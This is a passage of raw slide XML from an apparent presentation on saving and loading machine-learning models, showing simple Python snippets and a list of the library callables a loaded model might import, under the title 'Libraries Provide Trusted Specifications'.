          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719361" y="3607802"/>
            <a:ext cx="840965" cy="784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="635" name="Google Shape;635;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="963300"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Saver</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Google Shape;636;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5412875" y="953595"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Loader</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="637" name="Google Shape;637;p55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993550" y="2879550"/>
            <a:ext cx="646200" cy="402300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="638" name="Google Shape;638;p55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3445200" y="2562150"/>
            <a:ext cx="1999200" cy="719700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="639" name="Google Shape;639;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6201325" y="2604525"/>
            <a:ext cx="2746500" cy="863700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Q: Should a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> need to import these callables?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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3" name="Shape 643"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Google Shape;644;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3711800" y="3226200"/>
            <a:ext cx="3188100" cy="1166400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en" sz="1200">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.Model</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>torch.Tensor</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.read_weights_from_file</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.SGD</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Google Shape;645;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insight: Libraries Provide Trusted Specifications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Google Shape;646;p56"/>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647" name="Google Shape;647;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394500" y="1332600"/>
            <a:ext cx="3649500" cy="1046700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model.load(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.predict(input)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Google Shape;648;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351301"/>
            <a:ext cx="841200" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="25475">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="122200" lIns="122200" spcFirstLastPara="1" rIns="122200" wrap="square" tIns="122200">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1871"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="649" name="Google Shape;649;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351300"/>
            <a:ext cx="840977" cy="808511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="650" name="Google Shape;650;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719361" y="3607802"/>
            <a:ext cx="840965" cy="784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Google Shape;651;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="963300"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Saver</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652" name="Google Shape;652;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5412875" y="953595"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Loader</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="653" name="Google Shape;653;p56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3445200" y="2562150"/>
            <a:ext cx="1999200" cy="719700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="654" name="Google Shape;654;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6201325" y="2604525"/>
            <a:ext cx="2746500" cy="863700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Q: Should a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> need to import these callables?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="Google Shape;655;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="1332600"/>
            <a:ext cx="3427500" cy="1477500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent6"/>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chemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from lib import Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>train(model, corpus)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.save(‘model.bin’)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="656" name="Google Shape;656;p56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993550" y="2879550"/>
            <a:ext cx="646200" cy="402300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="lt2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
